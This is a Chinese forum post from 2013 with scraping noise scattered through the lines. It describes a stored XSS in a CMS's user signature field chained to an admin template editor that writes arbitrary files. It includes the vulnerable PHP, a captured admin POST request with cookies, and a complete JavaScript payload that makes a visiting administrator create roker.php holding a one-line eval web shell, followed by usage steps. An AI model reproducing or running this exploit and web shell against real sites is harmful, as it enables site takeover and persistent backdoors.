|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
]; N V: }8 @* {) a" K! Y$ \! @官网已经修补了,所以重新下了源码
# ~( c3 r- n, I5 u因为 后台登入 还需要认证码 所以 注入就没看了。
/ o& p$ m0 y8 H, _1 _. g存在 xss3 i" l7 m) @3 }% H/ e5 J
漏洞文件 user/member/skin_edit.php" S: h. s M. l4 ^# p
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
0 p% ]& j8 P- ?
8 _/ x& ~9 ~. A5 s, T9 x</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
/ ?6 c8 f! V- \4 @: \% X , _) C! o% }( q$ w. K' U
</textarea></td></tr>
$ Z8 S( C7 ?/ r* {. I4 ^3 @
" q& F8 s* ^! d$ h3 ~2 Y9 ^5 v4 Y/ { user/do.php 1 L. u$ H# s/ O9 w# s" l$ B9 R1 v
, x8 B/ r' F5 C- Y
4 Z9 J8 U _% k+ J5 k7 p! cif($op=='zl'){ //资料
' s( o* N0 b/ c; ^/ x m
$ G2 l0 G7 x1 _# f/ ` if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 4 [! ?) j- A6 |1 I0 j
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
2 g" g7 Z/ ~% d6 E! H
' ?& P" y$ F3 A. z6 H $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
$ m' q$ [$ [. }" t 1 n- K' L1 i7 T0 o$ `
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'. J+ _( b' q4 c4 J
where CS_Name='".$cscms_name."'";# G, T% |- F8 [4 J# e7 P
: I# B. O# ?3 S& D2 S; ? if($db->query($sql)){
0 D! Z) K2 { F& |% o$ t8 L( s 3 v9 z7 i" n/ z7 {. L& L
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
8 K5 w1 N/ {& q# G + ?3 p# a3 n9 n2 W0 J
}else{% P/ `7 H% c+ c6 C4 o" `
! V, P" g' Q4 E" h& O
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
( k7 R. {! y+ }/ i5 ^
* D% n- k, V) v* ~; z }- e2 |$ F7 [0 ]( G0 b
. k" V4 ?0 _$ F" R' u4 p& o+ u7 Y0 K/ c( ~
没有 过滤导致xss产生。7 U% N5 x/ j% t1 i% U
后台 看了下 很奇葩的是可以写任意格式文件。。+ y& |% t1 u% P" @ i% M
抓包。。" r1 u- }% m9 H2 d- ]
8 L: R% a- x; m4 k4 {
) x) a5 b* P4 u# m; ?本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
, G, A0 F( m! q9 K% o' y+ l/ F
* J3 ?2 k E. `, z$ iAccept: text/html, application/xhtml+xml, */*$ S$ `! L# N9 N. U' }4 l: n
$ Y- T; n6 t }3 B% O' kReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php1 E- Z1 P' y# |/ l; F5 O
! i1 b* v6 M9 o$ x# Z" q3 F( D
Accept-Language: zh-CN
: O0 y/ E2 Z+ D! ~, [( U9 \
: ?2 p7 z5 G( j6 P: J- m0 e, B: FUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)3 F/ F1 z7 z* Y# z; J' A7 }
5 S d7 i# f6 ]. m3 L zContent-Type: application/x-www-form-urlencoded5 k g* O3 u3 ~& z( d+ A' I! V/ g
) M9 E5 P8 U# }0 ~3 SAccept-Encoding: gzip, deflate1 C5 v& d5 U. C0 U
8 L! n& `/ d6 ?Host: 127.0.0.1# H, U* T* O* Y+ ?- v
+ G+ S3 u; r2 o9 n: dContent-Length: 38 u B! o/ y" d( b( i# s l: T
2 _( V4 v& ?( x
DNT: 1
# n2 t* W/ r( p2 l
( M2 O1 K# t, K& h: f! YConnection: Keep-Alive% E/ y& x0 z+ P3 A/ \
1 x' g; @4 p# M
Cache-Control: no-cache: ~2 M. t+ @" J+ s' Y
3 f3 W+ {* g( m: s0 R2 i& J1 e1 LCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594! Z1 @4 a$ Z; \8 o) q/ I) s
9 w3 A+ f) A$ {- d I1 a9 h3 N, D/ T4 ^: r- f) E+ ^$ \! B
name=aaa.php&content=%3Cs%3E%3Ca%25%3E0 c. I( }, o" j+ X" M$ J2 x
- ~* R( K5 V9 A& s
5 c- _: {8 [8 h7 j! l
6 a, \) y- T7 P# u L
于是 构造js如下。
5 K" I% p& f8 ]3 J3 E9 C$ \
* }2 m( e* n6 f1 K1 ]/ F/ t本帖隐藏的内容<script> 9 @( L' W+ j3 e4 L6 f3 C
thisTHost = top.location.hostname;
: v, u1 s i! p4 o- b5 s . e5 J+ I3 }+ w* n: T5 O9 o4 c
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
# N' u- e; a5 w6 U . Y5 R6 d% q& q) f
function PostSubmit(url, data, msg) {
; q' Q7 N/ p3 U ?( S! Z S, I var postUrl = url;: i/ G" N8 k) U% C
' C# a$ ?( b! ]8 m7 }; x var postData = data;
- s, M2 B% `, L0 F/ U9 r" Y0 ^ var msgData = msg; 9 S6 J0 `4 J( B$ E* D
var ExportForm = document.createElement("FORM"); ! ?/ r, F: s7 j* y- q
document.body.appendChild(ExportForm);
% w; R, J2 K# ]1 s+ f, O ExportForm.method = "POST";
' @( Q5 C/ g: V9 h" U( Z% r var newElement = document.createElement("input");
& b) W V1 l) e6 P* m- z newElement.setAttribute("name", "name"); 2 V, S4 f) k B7 r$ p
newElement.setAttribute("type", "hidden"); 5 i9 k, Z0 t( @! z9 x
var newElement2 = document.createElement("input");
' l3 o; H6 u. } newElement2.setAttribute("name", "content");
5 r/ }* C, k( [/ V9 P newElement2.setAttribute("type", "hidden");
$ p2 k) _3 b# l6 V4 _( \, ?$ M ExportForm.appendChild(newElement);
( J3 X& q: w: |* B6 g) M3 v" ^9 a ExportForm.appendChild(newElement2);
; p- S* \% w# R0 y. V newElement.value = postData; 3 Q* d+ ^1 d' n/ M. M3 ^, p
newElement2.value = msgData;
( s U4 q- v. _% R; s3 C* } ExportForm.action = postUrl;
$ d5 \* z1 i# U( { ExportForm.submit(); 2 q% m: S" u, t3 O
};* r9 Y* Z) |! h& Z' C* S9 P
! o$ P0 U/ X3 L. u& C$ }PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ L1 z1 y" b, D
* t% {1 s! V+ r5 ]& M2 O2 U</script>
9 E+ W& _% y9 r; _7 R2 Y0 Z
6 D/ X/ S: W! J' H2 U# B9 @8 ]4 w9 E% G# e; t9 |" e0 z9 a
/ I# q( }+ x; j) H+ u" d! a) Lhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
% ^0 L9 w7 _. d4 K p. c; U( `用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
i2 Y$ D0 ]. e$ Y1 Z就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
4 }. k, m2 P1 v9 h; |( C |
|
发表于 2013-11-6 18:09:37
收藏
分享
支持
反对